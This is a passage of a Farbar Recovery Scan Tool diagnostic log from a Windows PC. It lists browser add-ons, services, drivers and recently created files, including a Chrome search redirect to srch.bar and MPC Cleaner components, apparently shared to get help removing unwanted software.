BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL [2016-04-20] (Microsoft Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\Office15\OCHelper.dll [2016-03-15] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\ssv.dll [2015-02-04] (Oracle Corporation)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-04-20] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\jp2ssv.dll [2015-02-04] (Oracle Corporation)
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2015-02-03] (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2014-05-02] (Skype Technologies)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)

FireFox:
========
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-12] ( Microsoft Corporation)
FF Plugin: @microsoft.com/VirtualEarth3D,version=4.0 -> C:\Program Files (x86)\Virtual Earth 3D\ [No File]
FF Plugin-x32: @java.com/DTPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\dtplugin\npDeployJava1.dll [2015-02-04] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\plugin2\npjp2.dll [2015-02-04] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-11-03] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-12] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2014-08-16] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.0.8 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2015-06-26] (Adobe Systems Inc.)

Chrome:
=======
CHR DefaultSearchURL: Default -> hxxp://srch.bar/{searchTerms}
CHR DefaultSuggestURL: Default -> hxxp://srch.bar/?s={searchTerms}
CHR Profile: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (HD for YouTube™) - C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\akjbfncbadcmnkopckegnmjgihagponf [2015-11-19]
CHR Extension: (Adblock Plus) - C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2016-03-09]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-01]
CHR HKLM\...\Chrome\Extension: [bahkljhhdeciiaodlkppoonappfnheoi] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-4246815794-1745546178-596238576-500\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bahkljhhdeciiaodlkppoonappfnheoi] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [bahkljhhdeciiaodlkppoonappfnheoi] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2016-01-08]
StartMenuInternet: Google Chrome.Administrator - C:\Users\Administrator\AppData\Local\Google\Chrome\Application\chrome.exe

Opera:
=======
OPR Extension: (AdBlock) - C:\Users\Administrator\AppData\Roaming\Opera Software\Opera Stable\Extensions\aobdicepooefnbaeokijohmhjlleamfj [2016-04-25]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 avast! Antivirus; C:\Program Files\Alwil Software\Avast5\AvastSvc.exe [237096 2016-02-19] (AVAST Software)
R2 BlueSoleilCS; C:\Program Files (x86)\IVT Corporation\BlueSoleil\BlueSoleilCS.exe [1466476 2009-09-02] (IVT Corporation) [File not signed]
R3 BsHelpCS; C:\Program Files (x86)\IVT Corporation\BlueSoleil\BsHelpCS.exe [192000 2009-09-02] (IVT Corporation) [File not signed]
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2016-01-08] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2016-01-08] (Microsoft Corporation)
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2829552 2016-03-08] (Microsoft Corporation)
R2 DNTUS26; C:\Windows\SYSTEM32\DNTUS26.EXE [120768 2011-12-12] (SolarWinds)
R2 dwmrcs; C:\Windows\dwrcs\DWRCS.EXE [701376 2011-12-12] (SolarWinds)
S4 LMS; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe [262144 2009-09-30] (Intel Corporation) [File not signed]
R2 MPCProtectService; C:\Program Files (x86)\MPC Cleaner\MPCProtectService.exe [350688 2016-03-16] (DotC United Inc)
R2 ss_conn_service; C:\Program Files\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-01-08] (DEVGURU Co., LTD.)
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [246472 2015-06-12] (Synaptics Incorporated)
S4 UNS; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe [2314240 2009-09-30] (Intel Corporation) [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation)
S3 WsDrvInst; C:\Program Files (x86)\Wondershare\Dr.Fone for Android\DriverInstall.exe [X]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [37656 2016-02-19] (AVAST Software)
R1 aswKbd; C:\Windows\System32\Drivers\aswKbd.sys [22600 2013-05-09] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [107792 2016-03-09] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [103064 2016-02-19] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [74544 2016-02-19] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1070904 2016-03-09] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [463744 2016-02-24] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [165344 2016-02-19] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [287016 2016-02-19] (AVAST Software)
R1 DwMirror; C:\Windows\system32\DRIVERS\DamewareMini.sys [5632 2008-03-14] (DameWare Development, LLC)
R1 dwvkbd; C:\Windows\system32\DRIVERS\dwvkbd64.sys [30720 2008-03-13] (DameWare)
R1 MPCKpt; C:\Windows\System32\DRIVERS\MPCKpt.sys [60136 2016-03-16] (DotC United Inc)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [589824 2015-10-30] (Realtek )
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [42696 2015-06-12] (Synaptics Incorporated)
R3 Thotkey; C:\Windows\System32\drivers\Thotkey.sys [45728 2015-09-25] (Toshiba Corporation)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)
U3 idsvc; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-04-25 19:57 - 2016-04-25 19:57 - 02376192 _____ (Farbar) C:\Users\Administrator\Downloads\FRST64 (1).exe
2016-04-25 19:47 - 2016-04-25 19:47 - 00000000 ___HD C:\OneDriveTemp
2016-04-25 19:46 - 2016-04-25 19:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MPC
2016-04-22 20:53 - 2016-04-22 20:54 - 00059475 _____ C:\Users\Administrator\Downloads\Addition.txt
2016-04-22 20:51 - 2016-04-25 20:05 - 00030121 _____ C:\Users\Administrator\Downloads\FRST.txt
2016-04-22 20:50 - 2016-04-25 20:05 - 00000000 ____D C:\FRST
2016-04-22 20:50 - 2016-04-22 20:50 - 02375680 _____ (Farbar) C:\Users\Administrator\Downloads\FRST64.exe
2016-04-21 20:47 - 2016-04-25 19:46 - 00001805 _____ C:\Users\Public\Desktop\MPC Cleaner.lnk
2016-04-21 20:36 - 2016-04-21 20:36 - 03683904 _____ C:\Users\Administrator\Downloads\adwcleaner_5.112.exe
2016-04-21 10:43 - 2016-04-21 10:43 - 00034241 _____ C:\Users\Administrator\Desktop\The.Corpse.Of.Anna.Fritz.2015.srt
2016-04-18 01:14 - 2016-04-18 01:14 - 00000000 ____D C:\Users\Public\Documents\CrashDump
2016-04-17 23:07 - 2016-04-17 23:07 - 00000000 ____D C:\Program Files\Samsung
2016-04-17 23:07 - 2016-01-08 09:51 - 00213088 _____ (DEVGURU Co., LTD.(www.devguru.co.kr)) C:\WINDOWS\system32\Drivers\ssudmdm.sys
2016-04-17 23:07 - 2016-01-08 09:51 - 00120416 _____ (DEVGURU Co., LTD.(www.devguru.co.kr)) C:\WINDOWS\system32\Drivers\ssudbus.sys
2016-04-17 23:05 - 2016-04-17 23:06 - 00000000 ____D C:\ProgramData\Samsung
2016-04-17 23:05 - 2014-05-07 17:42 - 00144664 _____ (MAPILab Ltd. & Add-in Express Ltd.) C:\WINDOWS\SysWOW64\secman.dll
2016-04-17 23:01 - 2016-04-17 23:01 - 00000000 ____D C:\Users\Public\Documents\NativeFus_Log
2016-04-17 23:00 - 2016-04-17 23:11 - 00000000 ____D C:\Users\Administrator\Documents\samsung
2016-04-17 23:00 - 2016-04-17 23:05 - 00002049 _____ C:\Users\Public\Desktop\Samsung Kies 3.lnk
2016-04-17 23:00 - 2016-04-17 23:01 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\Samsung
2016-04-17 23:00 - 2016-04-17 23:00 - 00000000 ____D C:\Users\Administrator\Documents\SelfMV
2016-04-17 23:00 - 2016-04-17 23:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung
2016-04-17 22:59 - 2016-04-17 23:05 - 00000000 ____D C:\Program Files (x86)\Samsung
2016-04-17 22:43 - 2016-04-17 22:47 - 37141984 _____ (Samsung Electronics Co., Ltd. ) C:\Users\Administrator\Downloads\Kies3Setup.exe
2016-04-15 21:07 - 2016-04-15 21:07 - 01222144 _____ C:\Users\Administrator\Downloads\RSITx64 (2).exe
2016-04-15 20:10 - 2016-04-15 20:10 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2016-04-12 21:54 - 2016-03-29 11:20 - 02656952 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2016-04-12 21:54 - 2016-03-29 06:56 - 16985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2016-04-12 21:54 - 2016-03-29 06:52 - 11545600 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-04-12 21:54 - 2016-03-29 06:51 - 22378496 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-04-12 21:54 - 2016-03-29 06:41 - 24602112 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-04-12 21:54 - 2016-03-29 06:38 - 18673664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-04-12 21:54 - 2016-03-29 06:37 - 19340800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-04-12 21:53 - 2016-04-02 05:13 - 00369912 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2016-04-12 21:53 - 2016-04-02 05:10 - 00730344 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2016-04-12 21:53 - 2016-04-02 04:29 - 00127488 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEDataLayerHelpers.dll
2016-04-12 21:53 - 2016-04-02 04:26 - 00630272 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneProviders.dll
2016-04-12 21:53 - 2016-04-02 04:21 - 00498688 _____ (Microsoft Corporation) C:\WINDOWS\system32\tileobjserver.dll
2016-04-12 21:53 - 2016-04-02 04:19 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2016-04-12 21:53 - 2016-04-02 04:18 - 00988160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2016-04-12 21:53 - 2016-04-02 04:15 - 01090048 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2016-04-12 21:53 - 2016-04-02 04:14 - 03994624 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2016-04-12 21:53 - 2016-04-02 04:09 - 01832448 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.dll
2016-04-12 21:53 - 2016-04-02 04:07 - 03575296 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll
2016-04-12 21:53 - 2016-04-02 04:07 - 02158592 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-04-12 21:53 - 2016-04-02 04:00 - 01390080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2016-04-12 21:53 - 2016-03-29 11:22 - 01030416 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2016-04-12 21:53 - 2016-03-29 11:22 - 00874968 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-04-12 21:53 - 2016-03-29 11:20 - 07474016 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-04-12 21:53 - 2016-03-29 11:20 - 01317640 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-04-12 21:53 - 2016-03-29 11:20 - 01141504 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-04-12 21:53 - 2016-03-29 11:18 - 02152280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2016-04-12 21:53 - 2016-03-29 11:11 - 00686976 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsapi.dll
2016-04-12 21:53 - 2016-03-29 11:05 - 01152864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2016-04-12 21:53 - 2016-03-29 10:56 - 01297752 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2016-04-12 21:53 - 2016-03-29 10:37 - 01862008 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2016-04-12 21:53 - 2016-03-29 10:28 - 00696664 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupEngine.dll
2016-04-12 21:53 - 2016-03-29 10:28 - 00535080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dnsapi.dll
2016-04-12 21:53 - 2016-03-29 10:25 - 00258912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ufx01000.sys
2016-04-12 21:53 - 2016-03-29 10:19 - 00296488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\policymanager.dll
2016-04-12 21:53 - 2016-03-29 10:17 - 00300104 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppHost.exe
2016-04-12 21:53 - 2016-03-29 10:13 - 00986976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2016-04-12 21:53 - 2016-03-29 10:08 - 00358752 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2016-04-12 21:53 - 2016-03-29 10:08 - 00261376 _____ (Microsoft Corporation) C:\WINDOWS\system32\LsaIso.exe
2016-04-12 21:53 - 2016-03-29 09:44 - 00502104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupEngine.dll
2016-04-12 21:53 - 2016-03-29 09:41 - 00630632 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2016-04-12 21:53 - 2016-03-29 09:32 - 00253088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LockAppHost.exe
2016-04-12 21:53 - 2016-03-29 09:26 - 02403680 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2016-04-12 21:53 - 2016-03-29 09:24 - 00294752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2016-04-12 21:53 - 2016-03-29 09:21 - 00378208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS
2016-04-12 21:53 - 2016-03-29 09:07 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanagerprecheck.dll
2016-04-12 21:53 - 2016-03-29 09:01 - 00541304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2016-04-12 21:53 - 2016-03-29 08:50 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSysprep.dll
2016-04-12 21:53 - 2016-03-29 08:46 - 00365568 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2016-04-12 21:53 - 2016-03-29 08:42 - 00269824 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshostcore.dll
2016-04-12 21:53 - 2016-03-29 08:39 - 00550912 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2016-04-12 21:53 - 2016-03-29 08:38 - 00207360 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupSvc.dll
2016-04-12 21:53 - 2016-03-29 08:37 - 00617984 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2016-04-12 21:53 - 2016-03-29 08:36 - 00209408 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2016-04-12 21:53 - 2016-03-29 08:34 - 00641536 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2016-04-12 21:53 - 2016-03-29 08:30 - 00328192 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll
2016-04-12 21:53 - 2016-03-29 08:28 - 00460288 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapConfiguration.dll
2016-04-12 21:53 - 2016-03-29 08:27 - 00339968 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorService.dll
2016-04-12 21:53 - 2016-03-29 08:23 - 00628736 _____ (Microsoft Corporation) C:\WINDOWS\system32\MessagingDataModel2.dll
2016-04-12 21:53 - 2016-03-29 08:23 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXTaskFactory.dll
2016-04-12 21:53 - 2016-03-29 08:22 - 00438784 _____ (Microsoft Corporation) C:\WINDOWS\system32\AccountsRt.dll
2016-04-12 21:53 - 2016-03-29 08:20 - 00948736 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManager.dll
2016-04-12 21:53 - 2016-03-29 08:20 - 00166400 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll
2016-04-12 21:53 - 2016-03-29 08:19 - 00556032 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll
2016-04-12 21:53 - 2016-03-29 08:17 - 01056256 _____ (Microsoft Corporation) C:\WINDOWS\system32\JpMapControl.dll
2016-04-12 21:53 - 2016-03-29 08:17 - 00440320 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredProvDataModel.dll
2016-04-12 21:53 - 2016-03-29 08:16 - 00852480 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll
2016-04-12 21:53 - 2016-03-29 08:15 - 01714688 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRHInproc.dll
2016-04-12 21:53 - 2016-03-29 08:15 - 00970752 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-04-12 21:53 - 2016-03-29 08:14 - 00965632 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2016-04-12 21:53 - 2016-03-29 08:14 - 00859136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2016-04-12 21:53 - 2016-03-29 08:13 - 00587776 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2016-04-12 21:53 - 2016-03-29 08:12 - 00471552 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupShim.dll
2016-04-12 21:53 - 2016-03-29 08:11 - 00988160 _____ (Microsoft Corporation) C:\WINDOWS\system32\NMAA.dll
2016-04-12 21:53 - 2016-03-29 08:11 - 00881664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Input.Inking.dll
2016-04-12 21:53 - 2016-03-29 08:10 - 01388544 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-04-12 21:53 - 2016-03-29 08:10 - 00938496 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapControlCore.dll
2016-04-12 21:53 - 2016-03-29 08:09 - 01239552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Bluetooth.dll
2016-04-12 21:53 - 2016-03-29 08:07 - 01902592 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll
2016-04-12 21:53 - 2016-03-29 08:07 - 01213440 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2016-04-12 21:53 - 2016-03-29 08:06 - 01575936 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Speech.dll
2016-04-12 21:53 - 2016-03-29 08:06 - 00848896 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2016-04-12 21:53 - 2016-03-29 08:05 - 01395712 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2016-04-12 21:53 - 2016-03-29 08:02 - 02624512 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2016-04-12 21:53 - 2016-03-29 08:02 - 01211904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Cred.dll
2016-04-12 21:53 - 2016-03-29 08:02 - 00303104 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2016-04-12 21:53 - 2016-03-29 07:56 - 00821760 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2016-04-12 21:53 - 2016-03-29 07:56 - 00415232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2016-04-12 21:53 - 2016-03-29 07:55 - 01052160 _____ (Microsoft Corporation) C:\WINDOWS\system32\MsSpellCheckingFacility.dll
2016-04-12 21:53 - 2016-03-29 07:44 - 00498176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MessagingDataModel2.dll
2016-04-12 21:53 - 2016-03-29 07:43 - 00358400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AccountsRt.dll
2016-04-12 21:53 - 2016-03-29 07:42 - 03592704 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-04-12 21:53 - 2016-03-29 07:42 - 01410560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Http.dll
2016-04-12 21:53 - 2016-03-29 07:40 - 00787456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.dll
2016-04-12 21:53 - 2016-03-29 07:39 - 00350720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredProvDataModel.dll
2016-04-12 21:53 - 2016-03-29 07:37 - 01444352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRHInproc.dll
2016-04-12 21:53 - 2016-03-29 07:37 - 00799744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2016-04-12 21:53 - 2016-03-29 07:37 - 00792064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-04-12 21:53 - 2016-03-29 07:36 - 03351040 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2016-04-12 21:53 - 2016-03-29 07:36 - 00649728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2016-04-12 21:53 - 2016-03-29 07:35 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupShim.dll
2016-04-12 21:53 - 2016-03-29 07:34 - 00711680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapControlCore.dll
2016-04-12 21:53 - 2016-03-29 07:34 - 00682496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll
2016-04-12 21:53 - 2016-03-29 07:34 - 00418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenrollengine.dll
2016-04-12 21:53 - 2016-03-29 07:32 - 01731584 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-04-12 21:53 - 2016-03-29 07:32 - 01588224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll
2016-04-12 21:53 - 2016-03-29 07:32 - 01098240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2016-04-12 21:53 - 2016-03-29 07:31 - 02275328 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-04-12 21:53 - 2016-03-29 07:31 - 01946112 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2016-04-12 21:53 - 2016-03-29 07:31 - 01117184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.dll
2016-04-12 21:53 - 2016-03-29 07:30 - 01139712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2016-04-12 21:53 - 2016-03-29 07:28 - 01944576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2016-04-12 21:53 - 2016-03-29 07:28 - 00764928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Cred.dll
